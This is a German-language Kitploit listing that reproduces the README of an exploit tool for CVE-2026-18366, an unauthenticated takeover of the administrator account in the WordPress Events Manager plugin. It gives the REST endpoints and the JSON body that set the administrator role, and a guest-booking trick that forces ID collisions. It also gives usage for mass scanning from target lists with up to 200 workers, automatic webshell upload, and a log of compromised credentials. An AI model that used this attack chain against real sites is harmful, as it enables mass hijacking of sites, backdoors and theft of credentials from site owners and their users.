Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - Nicht authentifizierte Privilegieneskalation zum Administrator | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-18366
Privilege EscalationWeb-SchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-Exploitation
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - Nicht authentifizierte Privilegieneskalation zum Administrator

Repository anzeigen
225vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-18366

Events Manager < 7.4.1 - Nicht authentifizierte Privilegieneskalation zum Administrator

CVE CVSS WordPress

Typing SVG


🔗 Auf dem Laufenden bleiben

Telegram

Für die neuesten Zero-Days, Exploits und Sicherheitsforschung

Telegram Channel


📋 Schwachstellenübersicht

AttributDetails
CVE-IDCVE-2026-18366
Schweregrad🔴 KRITISCH (CVSS 9.8)
PluginEvents Manager für WordPress
Betroffene Versionen< 7.4.1
SchwachstellentypNicht authentifizierte Privilegieneskalation
AngriffsvektorNetzwerk
Erforderliche AuthentifizierungKeine

🔍 Technische Beschreibung

Ursachenanalyse

Die Schwachstelle befindet sich in EM\Archetypes::map_meta_cap innerhalb von classes/em-archetypes.php. Das Plugin schränkt sein Capability-Mapping fehlerhaft ein, indem es:

  1. Jede beliebige Objekt-ID als Post-ID behandelt
  2. $caps = [] leert, falls der Post ein event- oder location-CPT ist
  3. Capabilities für edit_user, delete_user oder promote_user nie wieder auffüllt
  4. Leere Caps → has_cap() gibt true zurück, auch für Benutzer 0 (Gast)

Angriffsvektor

POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Bedingung: {id} muss der wp_posts.ID eines event- oder location-CPT entsprechen.

⚠️ Nicht authentifiziertes REST erfordert kein Nonce (kein eingeloggtes Cookie).

Ausnutzung von Gastbuchungen

Gastbuchungen (dbem_bookings_anonymous=1 standardmäßig) erstellen echte WP-Benutzer, was das Erzwingen von ID-Kollisionen ermöglicht. Das Buchungs-Nonce ist öffentlich auf Event-Formularen verfügbar.


🚀 Verwendung

Voraussetzungen

pip install aiohttp

Schnellstart

python CVE-2026-18366.py

Das Skript fragt Folgendes ab:

  • list → Pfad zur Ziellisten-Datei (Standard: list.txt)
  • speed → Gleichzeitige Worker (Standard: 10)

Befehlszeilenoptionen

python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
OptionBeschreibung
-l, --listPfad zur Datei, die die Ziel-URLs enthält
-s, --speedAnzahl gleichzeitiger Worker (1-200)
--timeoutRequest-Timeout in Sekunden (Standard: 20)

Format der Zielliste

Erstellen Sie eine Datei list.txt mit einem Ziel pro Zeile:

https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Ausgabe

Konsolenausgabe

[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

Ergebnisdatei

Erfolgreiche Kompromittierungen werden in adminS.txt gespeichert:

https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Exploit-Ablauf

┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Funktionen

  • Asynchrone Architektur → Hochleistungsfähiges gleichzeitiges Scannen
  • Duale Angriffspfade → ID-Kollision + Ausnutzung von Gastbuchungen
  • Automatischer Shell-Upload → Bereitstellung von Plugin/Theme-Webshells
  • Versionserkennung → Automatische Identifizierung verwundbarer Versionen
  • Intelligente Benutzernamen-Enumeration → Mehrere Enumerationstechniken
  • Login-Verifizierung → Cookie- + XML-RPC-Validierung
  • Privilegieneskalation → Automatische Beförderung zum Administrator

📁 Dateistruktur

├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Haftungsausschluss

Tool herunterladen